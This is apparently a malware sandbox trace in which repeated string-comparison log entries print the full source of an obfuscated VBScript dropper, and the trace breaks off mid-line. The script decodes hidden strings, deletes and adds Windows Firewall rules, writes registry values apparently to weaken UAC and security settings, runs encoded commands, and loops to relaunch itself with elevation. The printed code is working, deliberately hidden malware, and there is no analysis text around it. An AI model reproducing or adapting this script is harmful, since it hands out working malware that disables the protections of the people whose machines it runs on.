bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.936] wcsncmp (_String1="r\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0222.936] wcsncmp (_String1="\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 76 [0222.936] wcsncmp (_String1="\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.937] wcsncmp (_String1="sr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf 